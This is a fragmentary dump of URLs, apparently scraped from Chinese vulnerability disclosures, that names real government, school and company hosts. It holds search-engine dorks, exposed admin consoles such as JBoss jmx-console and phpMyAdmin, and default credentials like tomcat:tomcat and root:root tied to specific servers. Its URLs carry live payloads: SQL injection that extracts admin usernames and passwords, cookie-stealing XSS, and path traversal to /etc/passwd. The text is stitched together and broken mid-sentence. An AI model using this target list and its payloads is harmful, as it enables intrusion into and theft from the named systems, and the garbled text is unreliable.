http://61.191.25.190/ http://www.gxjx.gov.cn:8080/gxjx/login.html http://211.144.20.169/cwfcbase/page/doLogin.action http://221.176.36.75:8081/login.jsp http://sgbbs.pps.tv/forum.php http://bfmnzbbs.pps.tv/forum.php http://qmdahbbs.pps.tv/forum.php http://bhzrbbs.pps.tv/forum.php http://114.255.181.72/news.do?action=detail&id=201409010337297127 http://dealer.chewen.com/1191/active/?carModelId=1%27 http://kj.ecp888.com/Silic.jsp www.hzqx.com/xlypt/Login.aspx http://bbs.smartisan.cn/home.php?mod=space&uid=1 http://bbs.smartisan.cn/uc_server/admin.php?m=user&a=login&iframe=&sid= www.aol.com邮箱漏洞存在点在信头区域,如下图: http://www.xxx.com/general/email/new/index.php?EMAIL_ID=7 http://eoffice8.weaver.cn:8028/general/email/new/index.php?EMAIL_ID=9503 http://eoffice8.weaver.cn:8028/general/email/new/index.php?EMAIL_ID=9504 http://www.sjd-logistics.com:8000/general/email/new/index.php?EMAIL_ID=726155 http://www.sjd-logistics.com:8000/general/email/new/index.php?EMAIL_ID=726152 http://www.xxoo.com/ikernel/admin/ http://www.xxx.com/ikernel/admin/IK_TABLE/field/?TABLE_ID=9 http://www.zjsme.gov.cn/1.txt http://www.zjrzfy.gov.cn/ http://www.zjzy.gov.cn/ http://www.jsjrfy.gov.cn/ http://www.njng.gov.cn/ http://www.jsrepc.com/ http://www.sundy-whcy.com/ http://www.njlsjjjc.gov.cn/溧水纪检监察网 http://www.jzscxh.com/ http://www.jnkjj.gov.cn/江宁科技局 http://www.jszlyy.com.cn/江苏省肿瘤医院 http://cxy.jnkjj.gov.cn/江宁区产学研合作信息网 http://www.jnkjj.gov.cn:80/ www.jnkjj.gov.cn inurl:etax2006 http://202.100.197.38:7009/etax2006/manage/index.htm http://182.151.197.163:8001/etax2006/manage/index.htm http://wssb.dlntax.gov.cn/etax2006/manage/index.htm http://dealer.chewen.com/1172/active/?carModelId=1521 http://www.sqlmap.org http://wuxi.eda.ac.cn/backend/base.php页面下的cookie中的DAUFzOmsgzusername参数。 site:chewen.com inurl:webtest.html www.chewen.com/admin/webtest.html http://page.renren.com/600002275 http://58.214.233.113:8800 http://www.timber2005.com/ http://www.timber2005.com/Customer.html http://t.cntv.cn/ http://adm.phpad.cn/admin/login.php http://www.speiyou.com/ http://sbj.speiyou.com/classes/view/ff80808144b18acb0144ba2ad1a33047 http://web.7k7k.com/s.php web.7k7k.com/games/download.php?from=1865135&url=http://www.wooyun.org http://tts.ytoxl.com/stockout/order-searchOrder.htm http://bbs.49you.com/ http://cgb.faw.com.cn/chaxun.asp?theID=40 inurl:/ycportal http://vehicle.zhonghuacar.com/huachenzhijia/shangwu/zhonghua/index.asp http://city.china.com/zhaoshang/ http://srm.geely.com/web/su/supplier/registerSupplierAttach.do?supplierItem=30 http://aid.ec.js.edu.cn/infoms/visitor/dcjyZxsq-bfxx201201.c www.jumei.com http://csm.eerong.com/login.action http://club.bankcomm.com/customer/productinfo/search.html?keyword=abcdefgh%22%29%29}a}%0D;alert%28document.cookie%29%0D%2F%2F http://www.ahcss.gov.cn/list/index.php?pid=4 http://www.heiyan.com/manage/client/feedback/179631 inurl:MessageBoard/Default.aspx http://www.dletyy.com/MessageBoard/Default.aspx?Page=368 http://www.baotiegroup.cn/MessageBoard/Default.aspx http://www.semi-chip.com/MessageBoard/Default.aspx?Page=4 http://changfenggardenhotel.com/MessageBoard/Default.aspx?Page=1 http://www.tianlaihotel.com/messageboard/Default.aspx?Page=1 http://www.yttijian.cn/MessageBoard/Default.aspx http://www.bsacn.com/MessageBoard/Default.aspx http://www.semi-chip.com/MessageBoard/Default.aspx?Page=4 http://econ.ruc.edu.cn/teacher_js.php?id=2257 http://youxi.kankan.com/list/?sort=update&typeid=8&styleid=9%22/%3E%3C/a%3E%3C/div%3E%3C/div%3E%3C/div%3E%3C/div%3E%3C/div%3E%3C/div%3E%3C/div http://youxi.kankan.com/list/?typeid=2&sort=updatedd%22%3E%3C/a%3E%3Cscript%3Ealert%281%29%3C/script%3E http://youxi.kankan.com/list/?sort=update&typeid=8&styleid=9%22%3E%3C/a%3E%3Cimg%20src=x%20onerror=alert%281%29%3E http://youxi.kankan.com/list/?typeid=2&sort=update%22%3E%3C/a%3E%3Cscript%3Ealert%281%29%3C/script%3E http://youxi.kankan.com/list/?typeid=5&nameid=1%22%3E%3C/a%3E%3Cimg%20src=x%20onerror=alert%281%29%3E http://youxi.kankan.com/list/?sort=update&typeid=8&styleid=9%22%3E%3C/a%3E%3Cscript%3Ealert%281%29%3C/script%3E http://youxi.kankan.com/list/?sort=update&typeid=1%22%3E%3C/a%3E%3Cscript%3Ealert%281%29%3C/script%3E http://youxi.kankan.com/list/?sort=hits%22%3E%3C/a%3E%3Cscript%3Ealert%281%29%3C/script%3E http://youxi.kankan.com/list/?nameid=1%22%3E%3C/a%3E%3Cscript%3Ealert%28/x/%29%3C/script%3E http://youxi.kankan.com/list/?sort=update&nameid=111%22%3E%3C/a%3E%3Cscript%3Ealert%281%29%3C/script%3E http://youxi.kankan.com/list/?typeid=5%22%3E%3C/a%3E%3Cscript%3Ealert%281%29%3C/script%3E http://youxi.kankan.com/list/?nameid=136&sort=update%22%3E%3C/a%3E%3Cscript%3Ealert%28/x/%29%3C/script%3E http://youxi.kankan.com/list/?artistid=1%22%3E%3C/a%3E%3Cscript%3Ealert%281%29%3C/script%3E http://youxi.kankan.com/list/?typeid=5&styleid=8%22%3E%3C/a%3E%3Cimg%20src=x%20onerror=alert%281%29%3E www.melearning.net ttp://exam.sccl.org.cn/system/stu_user_regist.aspx http://ajws.gov.cn/system/stu_user_regist.aspx http://www.fjforestry.gov.cn:38501/System/Stu_User_Regist.aspx http://www.qkjx.qdedu.net:8012/PXSystem/Stu_User_Regist.aspx http://61.147.105.168:8003/PXSystem/Stu_User_Regist.aspx http://zy.52edu.org/PXSystem/Stu_User_Regist.aspx http://exam1.timber2005.com/system/stu_user_regist.aspx http://px3.timber2005.com/System/Stu_User_Regist.aspx http://61.147.105.168:8010/system/stu_user_regist.aspx http://www.rcjxjy.com/system/stu_user_regist.aspx http://www.frpx.cn/system/stu_user_regist.aspx http://www.fjforestry.gov.cn:38501/System/Stu_User_Regist.aspx http://www.jzkjpx.cn/system/stu_user_regist.aspx http://www.fjforestry.gov.cn:38501/system/stu_user_regist.aspx http://www.fjforestry.gov.cn:38501/login.aspx http://www.fjforestry.gov.cn:38501/usercontrol/ajax.aspx http://wooyun.org/bugs/wooyun-2010-053752 http://223.68.141.131 www.renwuyi.com http://baike.baidu.com/view/12975094.htm?fr=aladdin http://pcedu.pconline.com.cn/457/4572860.html http://www.headnews.cn/2014/0903/408866.shtml http://www.baidu.com/s?ie=utf-8&f=8&rsv_bp=1&ch=3&tn=90668161_hao_pg&bar=&wd=%E6%95%8F%E6%84%9F%E4%BF%A1%E6%81%AF%E6%B3%84%E9%9C%B2+news&rsv_enter=1&rsv_sug3=15&rsv_sug4=683&rsv_sug2=0&inputT=2584 http://www.renwuyi.com/register.html http://www.renwuyi.com/single_suggest.html http://www.renwuyi.com/single_suggest.html www.xxxx.com/suggest.html inurl:edoas2/oa.jsp http://218.22.26.133/jmx-console/ http://oa.masedu.cn/jmx-console/ http://218.22.18.154/jmx-console/ http://220.178.254.174/jmx-console/ http://off.whedu.net:8000/jmx-console/ http://218.23.26.78:8000/jmx-console/ http://220.178.77.251:88/jmx-console/ http://218.22.181.220/jmx-console/ http://oa.ahfyjy.com:8088/jmx-console/ http://oa.aqtc.edu.cn/jmx-console/ http://www.aqdg.com:8080/jmx-console/ http://edoas.ahyky.com/jmx-console/ http://202.116.45.214/jmx-console/ http://219.129.189.242/jmx-console/ http://oazw.hsyxedu.cn/jmx-console/ http://218.14.214.239/jmx-console/ http://121.8.214.87/jmx-console/ http://121.15.218.196/jmx-console/ http://220.178.254.174/jmx-console/ http://61.141.21.109/jmx-console/ http://210.35.128.3/jmx-console/ http://210.35.49.30/jmx-console/ http://dzzw.tcjyj.cn:81/jmx-console/ http://61.146.233.170/jmx-console/ http://222.204.116.8/jmx-console/ http://222.204.120.8/jmx-console/ http://www.mzsjy.cn/jmx-console/ http://218.22.29.248/jmx-console/ http://218.22.44.183/jmx-console/ http://218.22.55.247/jmx-console/ http://218.22.181.220/jmx-console/ http://218.22.18.154为案例对象: http://m.ctrip.com/html5/Account/Login.html http://m.ctrip.com http://v2.117go.com/index.php?c=admin&a=main http://cz.bozhou.gov.cn/topic/blue/index.php?ty=1 http://bg.dltour.gov.cn/NetApply/travelpj_login.asp http://bg.dltour.gov.cn/hangyeguanli/shangboatongji/t_hotel_image.asp?lngID=454 http://raxy.gov.cn www.bhxhdanang.gov.vn https://ebooking.ctrip.com/hotel-supplier-ebookinglogin/EbookingLogin.aspx https://ebooking.ctrip.com http://219.141.62.6/common/login/login_submit.action http://www.lilyren.com//faq.php?action=grouppermission&gids[99]=%27&gids[100][0]=%29%20and%20%28select%201%20from%20%28select%20count%28*%29,concat%28%28select%20%28select%20%28select%20concat%28username,0x27,password%29%20from%20cdb_members%20limit%201%29%20%29%20from%20%60information_schema%60.tables%20limit%200,1%29,floor%28rand%280%29*2%29%29x%20from%20information_schema.tables%20group%20by%20x%29a%29%23 http://www.whdsjkj.gov.cn/general/download.aspx?path= http://www.100tal.com/ywtx/jiajiaoban/ http://souke.jiajiaoban.com/teachers/index/tuiguang:/teacherid:ff8080812865f0a20128758fb31d2648 http://test.51talk.com/.svn/entries http://tonggao.baidu.com/ http://cn.mall-builder.com/admin/ admin:admin登陆后, http://cn.mall-builder.com/admin/up_db.php http://democn.mall-builder.com/为例, http://democn.mall-builder.com/main.php?m=member&s=admin_member修改个人资料,其中,头像下方的 http://drops.wooyun.org/tips/2562)。 URLhttp://mail.scal.com.cn/mail/admin.nsf/MainPage?OpenPage http://124.127.125.87:9090/Admin http://vip.stock.finance.sina.com.cn/fund_center/api/jsonp.php/IO.XSRV2.CallbackList%5B%27lAv4TYdRGBuGTcuo%27%5D/NetValueReturn_Service.NetValueReturnOpen?page=1&num=20&sort=form_start&asc=0&ccode=80000221&type2=0&type3=&%5Bobject%20HTMLDivElement%5D=sjzwy http://124.127.125.70/ http://124.127.125.70/20140226.bak/mobileInterfaceTest/Interface.asmx http://124.127.125.70/20140226.bak/mobileInterfaceTest.rar https://accounts.ctrip.com http://tts7.tarena.com.cn/essay/findCenterByName POST:key=1 http://ischool.edu.sina.com.cn/app_school/interface/getproOrder?pro=1 http://china5e.com http://bjxdf.com/pass.php http://182.140.145.96:8081/iimeetclient/index.do http://171.111.157.198/admin.php http://www.hecie.net/admin/ http://www.cmu4h.cn/default/contents/content/i/683 http://www.hjsoft.com.cn/ http://www.hjsoft.com.cn/2525/1040/index.shtml http://60.190.203.25:59999/templates/index/hrlogon.jsp http://ehr.topsearch.com.hk/templates/index/hrlogon.jsp http://221.123.128.41/templates/index/hrlogon.jsp http://hr.bjn3cc.com/templates/index/hrlogon.jsp http://202.205.112.6/templates/index/hrlogon.jsp http://27.112.9.28:8081/templates/index/hrlogon.jsp http://intranet.topsearch.com.hk/templates/index/hrlogon.jsp http://218.64.68.150:8888/templates/index/hrlogon.jsp http://hr.airport.gx.cn:8089/templates/index/hrlogon.jsp http://61.133.218.206:8888/templates/index/hrlogon.jsp http://www.hjsoft.com.cn:8089/(官方在线试用) http://product.tezhongzhuangbei.com/lb.asp?b=24 http://www.tezhongzhuangbei.com/admin/admin_login.asp http://www.tezhongzhuangbei.com/oa/ http://www.tezhongzhuangbei.com/admin/bug/ http://1.192.125.37/hl/mobile_update.aspx?zongji=961991301 http://1.192.125.37/hl/mobile_update.aspx?zongji=961991301 http://218.200.124.71:9090/login.asp http://218.200.124.71:81/ http://111.47.65.11:9090/ http://218.200.124.70/login.aspx http://gs.10010qm.com/searchCy.action http://ha.mail.chinaunicom.cn/login.aspx http://ha.mail.chinaunicom.cn/login.aspx http://www.sx-dj.gov.cn/admin/pub_newssearch.asp http://www.bass.gov.cn/manage/login.asp http://222.240.*.***/ www.tftpay.com http://yy.tftpay.com/merchant/merchantLogin!login.action http://zyas.5173.com/service.aspx http://zyas.5173.com/setneedupdate.aspx http://zyas.5173.com/upload163privatekey.aspx http://61.185.224.15/ http://61.185.224.15/ACC_CJCX/ps/grade/cy_queryPage.do http://i.travel.sina.com.cn/interface/travel/channel/json_get_travel_list_by_love_uid.php?t=jsonp&callback=12085&uid=1887467502 www.webluker.com http://my.webluker.com/registration/resetpwd/xxx@163.com/cb4f4106727bc6ac71bcd772b75b4e75 http://my.webluker.com http://222.240.133.53:8080/dpmis/ http://bbs.55.la/thread-1445532-1-1.html http://218.26.97.20:7001/defaultroot/public/edit/admin/default.jsp http://61.191.17.216:7001/defaultroot/public/edit/admin/default.jsp http://220.178.116.78:7001/defaultroot/public/edit/admin/default.jsp http://220.178.41.202:8081/defaultroot/public/edit/admin/default.jsp http://xzwsxx.org/sys_jmda2/ http://www.sqhealth.net/ http://ggws.tzcdc.org/ http://cn.shop-builder.cn/admin/为例,管理员登陆后,向http://cn.shop-builder.cn/admin/up_db.php http://democn.shop-builder.cn/为例,用户注册后,访问 http://democn.shop-builder.cn/main.php?m=member&s=admin_member http://test.com/test.js http://bbs.chinadaily.com.cn/home.php?mod=space&uid=1619413&do=blog&quickforward=1&id=22513 http://117.131.217.25/home/loginNew.action http://117.131.217.25/wooyun.jsp http://tiaoji.mbachina.com/activity/show?id=974 http://fuwu.oppo.com:8899/ http://fuwu.oppo.com:8899/sysadmin/index.asp http://fuwu.oppo.com:8899/sysadmin/search.asp http://fuwu.oppo.com:8899/ http://gzwnq.88ip.cn:9090/sys/plugin/plugin_form_edit.jsp?done=&key=a http://gzwnq.88ip.cn:9090/sys/regUI.jsp?regName=111 http://gzwnq.88ip.cn:9090/permissionsreport/pMonitor.jsp?photoId=1&modelid=111 http://gzwnq.88ip.cn:9090/sys/left.jsp?lx=1 http://gzwnq.88ip.cn:9090/security/check.jsp?name=1&id=1 http://gzwnq.88ip.cn:9090/permissionsreport/pMonitor.jsp?photoId=1&modelid=111 http://gzwnq.88ip.cn:9090/sys/regListUI.jsp?searchKeyvalue=111 http://220.168.210.109:9090/sys/regUI.jsp?regName=111 http://fsd2014.f3322.org:9090/sys/regUI.jsp?regName=111 http://oa.hzuf.com:9090/sys/regUI.jsp?regName=111 http://gzwnq.88ip.cn:9090/sys/regUI.jsp?regName=111 http://183.129.249.246:9090/sys/regUI.jsp?regName=111 http://116.7.241.29//sys/regUI.jsp?regName=111 http://oa.shunhengli.com:9090/sys/regUI.jsp?regName=111 http://oa.chnjcdc.com:9090/sys/regUI.jsp?regName=111 http://115.29.234.197:8090/sys/regUI.jsp?regName=111 http://119.145.194.122:9090/sys/regUI.jsp?regName=111 http://220.168.210.109:9090/sys/plugin/plugin_form_edit.jsp?done=&key=a http://fsd2014.f3322.org:9090/sys/plugin/plugin_form_edit.jsp?done=&key=a http://oa.hzuf.com:9090/sys/plugin/plugin_form_edit.jsp?done=&key=a http://gzwnq.88ip.cn:9090/sys/plugin/plugin_form_edit.jsp?done=&key=a http://183.129.249.246:9090/sys/plugin/plugin_form_edit.jsp?done=&key=a http://116.7.241.29//sys/plugin/plugin_form_edit.jsp?done=&key=a http://oa.shunhengli.com:9090/sys/plugin/plugin_form_edit.jsp?done=&key=a http://oa.chnjcdc.com:9090/sys/plugin/plugin_form_edit.jsp?done=&key=a http://115.29.234.197:8090/sys/plugin/plugin_form_edit.jsp?done=&key=a http://119.145.194.122:9090/sys/plugin/plugin_form_edit.jsp?done=&key=a http://220.168.210.109:9090/permissionsreport/pMonitor.jsp?photoId=1&modelid=111 http://fsd2014.f3322.org:9090/permissionsreport/pMonitor.jsp?photoId=1&modelid=111 http://oa.hzuf.com:9090/permissionsreport/pMonitor.jsp?photoId=1&modelid=111 http://gzwnq.88ip.cn:9090/permissionsreport/pMonitor.jsp?photoId=1&modelid=111 http://183.129.249.246:9090/permissionsreport/pMonitor.jsp?photoId=1&modelid=111 http://116.7.241.29//permissionsreport/pMonitor.jsp?photoId=1&modelid=111 http://oa.shunhengli.com:9090/permissionsreport/pMonitor.jsp?photoId=1&modelid=111 http://oa.chnjcdc.com:9090/permissionsreport/pMonitor.jsp?photoId=1&modelid=111 http://115.29.234.197:8090/permissionsreport/pMonitor.jsp?photoId=1&modelid=111 http://119.145.194.122:9090/permissionsreport/pMonitor.jsp?photoId=1&modelid=111 http://222.178.179.20/login/validate_yhgl.do www.sino-manager.com/Pages/administrate1/CeoTableMg.aspx http://www.maticsoft.com/shop.aspx http://shop1.maticsoft.cn/ http://shop1.maticsoft.cn/Upload/AD/34/201306251621094269405.jpg http://shop1.maticsoft.cn/SNS/Group/Create,创建是选择一个正常文件上传后保存。 http://www.xyiz.gov.cn/ http://sme.ujs.edu.cn/ http://118.123.221.150/ http://118.123.221.150/info.php http://oa.hzuf.com:9090/fenc/syncbasedoc.jsp?pk_corp=1111&opt=sync http://oa.hzuf.com:9090/fenc/ncsubjass.jsp?subjcode=1 http://oa.hzuf.com:9090/document/file_publish_open.jsp?id=1 http://oa.hzuf.com:9090/common/selectMoreOrganizeTree.jsp?id=1 http://oa.hzuf.com:9090/cooperate/flow/loadInforData.jsp?guid=11 http://oa.hzuf.com:9090/carManager/carUseDetailList.jsp?CAR_BRAND_NO=1 http://gzwnq.88ip.cn:9090/fenc/syncbasedoc.jsp?pk_corp=1111&opt=sync http://oa.hzuf.com:9090/fenc/syncbasedoc.jsp?pk_corp=1111&opt=sync http://oa.shunhengli.com:9090/fenc/syncbasedoc.jsp?pk_corp=1111&opt=sync http://119.145.194.122:9090/fenc/syncbasedoc.jsp?pk_corp=1111&opt=sync http://115.29.234.197:8090/fenc/syncbasedoc.jsp?pk_corp=1111&opt=sync http://220.168.210.109:9090/fenc/syncbasedoc.jsp?pk_corp=1111&opt=sync http://saip888.ufyct.com:9090/fenc/syncbasedoc.jsp?pk_corp=1111&opt=sync http://www1.elkay.com.cn:9090/fenc/syncbasedoc.jsp?pk_corp=1111&opt=sync http://oa.chnjcdc.com:9090/fenc/syncbasedoc.jsp?pk_corp=1111&opt=sync http://gzwnq.88ip.cn:9090/document/file_publish_open.jsp?id=1 http://oa.hzuf.com:9090/document/file_publish_open.jsp?id=1 http://oa.shunhengli.com:9090/document/file_publish_open.jsp?id=1 http://119.145.194.122:9090/document/file_publish_open.jsp?id=1 http://115.29.234.197:8090/document/file_publish_open.jsp?id=1 http://220.168.210.109:9090/document/file_publish_open.jsp?id=1 http://saip888.ufyct.com:9090/document/file_publish_open.jsp?id=1 http://www1.elkay.com.cn:9090/document/file_publish_open.jsp?id=1 http://oa.chnjcdc.com:9090/document/file_publish_open.jsp?id=1 http://gzwnq.88ip.cn:9090/fenc/ncsubjass.jsp?subjcode=1 http://oa.hzuf.com:9090/fenc/ncsubjass.jsp?subjcode=1 http://oa.shunhengli.com:9090/fenc/ncsubjass.jsp?subjcode=1 http://119.145.194.122:9090/fenc/ncsubjass.jsp?subjcode=1 http://115.29.234.197:8090/fenc/ncsubjass.jsp?subjcode=1 http://220.168.210.109:9090/fenc/ncsubjass.jsp?subjcode=1 http://saip888.ufyct.com:9090/fenc/ncsubjass.jsp?subjcode=1 http://www1.elkay.com.cn:9090/fenc/ncsubjass.jsp?subjcode=1 http://oa.chnjcdc.com:9090/fenc/ncsubjass.jsp?subjcode=1 http://www.mailer.com.cn/Products6.html http://sklnbd.bjmu.edu.cn//plus/recommend.php?action=&aid=1&_FILES[type][tmp_name]=\%27%20%20or%20mid=@%60\%27%60%20/*!50000union*//*!50000select*/1,2,3,%28select%20CONCAT%280x7c,userid,0x7c,pwd%29+from+%60%23@__admin%60%20limit+0,1%29,5,6,7,8,9%23@%60\%27%60+&_FILES[type][name]=1.jpg&_FILES[type][type]=application/octet-stream&_FILES[type][size]=6878 http://prob.csu.edu.cn/ http://prob.csu.edu.cn/plus/recommend.php?action=&aid=1&_FILES[type][tmp_name]=\%27%20%20or%20mid=@%60\%27%60%20/*!50000union*//*!50000select*/1,2,3,%28select%20CONCAT%280x7c,userid,0x7c,pwd%29+from+%60%23@__admin%60%20limit+0,1%29,5,6,7,8,9%23@%60\%27%60+&_FILES[type][name]=1.jpg&_FILES[type][type]=application/octet-stream&_FILES[type][size]=6878 http://3z.xinhui.gov.cn/navigate.do?method=getSubMenuContent&id=8432&menuno=03 http://3z.kaiping.gov.cn/navigate.do?method=getPolicyinfoDataById&id=2631&menuNo=05 http://zsjypt.cwgk.net/navigate.do?method=getPolicyinfoDataById&id=1036&menuNo=07 http://61.145.9.94:8000/navigate.do?method=getPolicyinfoDataById&id=567&menuNo=05 http://3zhs.cwgk.net:8081/navigate.do?method=countentById&id=257&tabelname=policyinfo&menu=85 http://3z.doumen.gov.cn:8080/navigate.do?method=getDetailContent&id=1680&menuNo=05 http://www.eydcb.cn/blue_show.aspx?paperName=%E7%87%95%E9%83%BD%E6%99%A8%E6%8A%A5&qnum=2714 http://zsjggw.xnu.edu.cn/blue_show.aspx?paperName=%e6%b9%98%e5%8d%97%e5%ad%a6%e9%99%a2%e6%8b%9b%e7%94%9f%e7%ae%80%e7%ab%a0&qnum=2014 http://p.xyhuatai.com/blue_show.aspx?paperName=%E5%92%B8%E9%98%B3%E5%8D%8E%E6%B3%B0%E5%86%85%E5%88%8A&qnum=2013058 http://p.hsort.com/blue_show.aspx?paperName=%E4%BB%8A%E6%97%A5%E9%9D%92%E5%B7%9D%E6%95%B0%E5%AD%97%E6%8A%A5%EF%BC%8C%E7%94%B5%E5%AD%90%E6%8A%A5&qnum=1 http://p.xyhuatai.com/blue_show.aspx?paperName= http://xue.fmx.cn/common/daohang.php?t_id=2 http://workspace.ec-ae.com/wiki/index.php wangyan:326459 http://scm.ec-ae.com/platform/branches/current http://scm.ec-ae.com/ecaepartner/branches/current http://app.ec-os.net/svn/hudsonecae/trunk/health_check http://scm.ec-ae.com/www/trunk http://t1.fanwe.net:85/index.php?action=index&hot=5 http://ichtf.dbw.cn/dhcx/browse/download_10_web.php?id=28423 http://www.zt56.com.cn:8081/*****/haoma.jsp inurl:case.php http://www.riyaozs.com/case.php?action=detail&id=165&sortid=10 http://www.qdbast.com/case.php?sortid=4&id=128 http://www.qdmgml.com/case_detail.php?id=56 http://www.qingdaozhn.com/case_detail.php?id=186 http://tianzhengjiaye.com/case_detail.php?id=44 http://www.ssjs-china.com/case.php?id=35&action=detail http://www.jhdgyp.com/case.php?id=7&action=detail http://www.sdjiesen.com/case_detail.php?id=1099 http://www.whhuajin.com/case.php?sortID=&id=76 http://www.water-green.com/case_detail.php?id=73 http://www.yiqiangyuan.com/case.php?sortID=4&act=detail&id=32 http://www.qdhuirui.com/case.php?sortID=11&act=detail&id=20 http://www.water-green.com/case_detail.php?id=11 SID:drcom http://182.48.103.188:9080/servlet/com.runqian.base.util.ReadJavaScriptServlet?file=../../../../../../../conf/resin.conf http://v.youku.com/v_show/id_XNzc1MTczMjM2.html url:http://221.232.145.230:80/manager/html user:tomcat pass:tomcat http://oa.zwcad.com/defaultroot/custom_form/smartUpload.jsp?path=innerMailbox&mode=add&fileName=innerMailFileName&saveName=innerMailSaveName&tableName=innerMaildisplaytable&fileMaxSize=0&fileMaxNum=0&fileType=&fileMinWidth=0&fileMinHeight=0&fileMaxWidth=0&fileMaxHeight=0 http://youth.xupt.edu.cn/ inurl:geren_list_page.aspx http://qlgk.taixing.gov.cn/index_page/geren_list_page.aspx?server=1&refid= http://qlgk.taixing.gov.cn/index_page/geren_list_page.aspx?server=1'&refid= http://www.upp.cn:8084/wap/show_article.jsp?id=012968 http://zsks.rajyj.com/show1.asp?id=4130 http://210.26.24.26/WebCenterST/admin/login.action http://oa.bdgslz.com/sysoa/admin/Manage.aspx?pkid=4424&job=4421 http://116.252.82.204/main.do http://www.jhun.edu.cn/gcontent.asp?id=109979 content://com.speedsoftware.rootexplorer.content/ content://com.speedsoftware.rootexplorer.content/etc/hosts,发请求后就可以读取/etc/hosts的文件内容。 http://222.178.243.43/admin/login.aspx http://shydj.gaoyou.gov.cn/admin/login.asp?action=logout http://www.jjjtj.gov.cn/hwcrm/login.php http://www.tzjsda.gov.cn/hwcrm/login.php http://www.dyinfo.gov.cn/backstage/login.asp http://zmhd.xianfeng.gov.cn/gldl/login.asp http://www.jzssfj.gov.cn/system/login.aspx http://www.ahwst.gov.cn:8011/xnjs/login.asp http://job.ccqrsj.gov.cn/admin/login.aspx http://www.jjlib.gov.cn/admin/index.php https://60.10.19.155/user/requireLogin https://59.45.93.20/user/requireLogin https://115.182.84.68/user/requireLogin http://hbmt.hisense.com/cn/product.aspx?ClassID=z8UwZw http://hbmt.hisense.com/cn/product.aspx?ClassID=z8UwZwanMEg%3d&Speed=10.3125G http://eapa.eegmusic.com/ http://eapa.eegmusic.com/download.php?path=upload/../../../../../../../../etc/passwd inurl:newsDetail.asp?id= http://www.sz-henry.com/NewsList.asp?ID=21*&classid=1 http://www.youyazx.com/newsDetail.asp?id=135 http://www.szghzdh.com/newsDetail.asp?id=52 http://www.wjmingde.com/newsDetail.asp?id=70 http://www.szwater120.com/newsDetail.asp?id=71&classID=1 http://ynxd56.com/login.do inurl:appellate/appellate.do url:appellate/appellate.do?act=queryByPWD&jlbh=1&querypwd=1 http://tx12345.tx.gov.cn/txwsxf/appellate/appellate.do?act=queryByPWD&jlbh=1&querypwd=1 http://122.224.76.165/xcwsxf/appellate/appellate.do?act=queryByPWD&jlbh=1&querypwd=1 http://www.xiaoshan.gov.cn:9080/xswsxf/appellate/appellate.do http://szxx.lx.gov.cn/appellate/appellate.do?act=queryByPWD&jlbh=1&querypwd=1 http://220.191.220.84/jxszxx/appellate/appellate.do?act=queryByPWD&jlbh=1&querypwd=1 http://www.hzxf12345.gov.cn/appellate/appellate.do http://www.xcrfb.gov.cn/include/content.php?id=52 http://183.203.21.86:8086/yiyahars_hospital/dept/index?hospId=6 http://pk.music.9you.com/ http://pk.ent.9you.com/front_aboutus.php?about_id=1 http://bizchina.chinadaily.com.cn/uarticle.shtml?id=69494 http://blog.chinadaily.com.cn/photo.php?bid=82%20%27&lanmu=Focus%20on%20China&mod=list http://career.chinadaily.com.cn/list.shtml?Curp= http://www.xanet.net/case.php inurl:inurl:homeLogin.action inurl:xxsearch.action www.xxx.com http://www.xxx.com http://www.biad.com.cn/cenep/biad/common/zpzs/biaoti.aspx?flag=nd&begin=2006&end=2020 http://xp.chinanetcenter.com/ http://120.198.232.44:8090/smartdns/loginPortal.action http://app1.chinadaily.com.cn/appdesk/vote/survey_comment_show.shtml?stid=1058%27 http://www.zzxfj.gov.cn/)上按如下图操作即可验证上图链接的真实性 http://218.28.253.38:90/ResponseUrl.aspx?DEPTGUID=3 http://218.28.253.38:90/ResponseUrl.aspx?DEPTGUID=4 http://218.28.253.38:90/ResponseUrl.aspx?DEPTGUID=5 http://218.28.253.38:90/ResponseUrl.aspx?DEPTGUID=6 http://218.28.253.38:90/ResponseUrl.aspx?DEPTGUID=7 http://218.28.253.38:90/ResponseUrl.aspx?DEPTGUID=8 http://218.28.253.38:90/ResponseUrl.aspx?DEPTGUID=17 http://218.28.253.38:90/ResponseUrl.aspx?DEPTGUID=17,而DEPTGUID存在注入 url:http://218.70.18.59:9011/Login.aspx http://tiaoji.mbachina.com/wenda/posts/reply?id=762 http://tiaoji.mbachina.com/activity/show?id=974 http://www.math.zju.edu.cn/upload/LOGIN.ASP bhz.tangxian.gov.cn/xinxigongkai.asp www.txzfjsj.gov.cn/xinxigongkai.asp www.txgdj.com/xinxigongkai.asp www.txws.gov.cn/xinxigongkai.asp www.txzjj.gov.cn/xinxigongkai.asp www.txhjbhj.gov.cn/xinxigongkai.asp www.txgsj.gov.cn/xinxigongkai.asp www.txnyj.gov.cn/xinxigongkai.asp http://www.txzjj.gov.cn/xinxigongkaiinfo.asp?ID=06E3948C-686E-488C-BDD5-E8DB7674E924 http://www.tchjbh.gov.cn/ http://www.tchjbh.gov.cn/www.zip http://www.yuanping.gov.cn/templet/display.php?id=5623 http://www.baidu.com/img/baidu_sylogo1.gif http://kf.meizu.com/login.php http://www.jl-n-tax.gov.cn/index_ww/ssxcy//list.jsp?i_content_sort=1544 http://www.jl-n-tax.gov.cn/index_ww/ssxcy//list.jsp?i_content_sort=1544 http://www.syftyy.com/default/contents/content/i/204 http://nba.weibo.com/ http://www.cms.zju.edu.cn/news.asp?id=954 http://www.u591.com/sw/news.php?id=2364 http://down.admin5.com/php/105478.html http://www.duote.com/soft/109798.html http://wlkc.nbdhyu.edu.cn:8080/phpmyadmin/ username:root password:root http://www.qhdgsj.gov.cn/manage/login.asp http://www.qhdgsj.gov.cn/manage/ http://218.25.82.237/ewl/excel_model/download.jsp?filepath=../../../../../../../../../../../etc/passwd http://218.25.82.237/ewl/system_manage/ http://sjwzr.wzu.edu.cn/list.aspx?id=36 http://tech.sina.com.cn/it/2013-06-15/07188442066.shtml http://www.jyyyw.com/index.php?word=%E6%8B%9B%E8%81%98&tid=949%2C391%2C392%2C393&a=search&c=article&button2=+ http://club.wacom.cn/member/postwork.aspx http://ichuguo.chinadaily.com.cn/article/index/aid/17584915 ichuguo.chinadaily.com.cn/article/index/aid/17584915* https://zzxs.moe.edu.cn/login.do https://zzxs.moe.edu.cn/console/viewStudentMain.do?stid=144914962&schoolid=8079 http://www.jngp.gov.cn/index.action http://zpdc.gdep.com.cn:82/phpmyadmin/ http://221.179.6.108:8004/Login.aspx http://cloud.video.taobao.com/videoapi/auth.php http://cloud.video.taobao.com/videoapi/auth.php http://122.225.117.132:81/FTP/Pic www.153.cn:8081 http://221.179.6.108/ http://121.22.25.5/,居然连域名都没有 http://www.gd189fq.com/goods.php?id=87 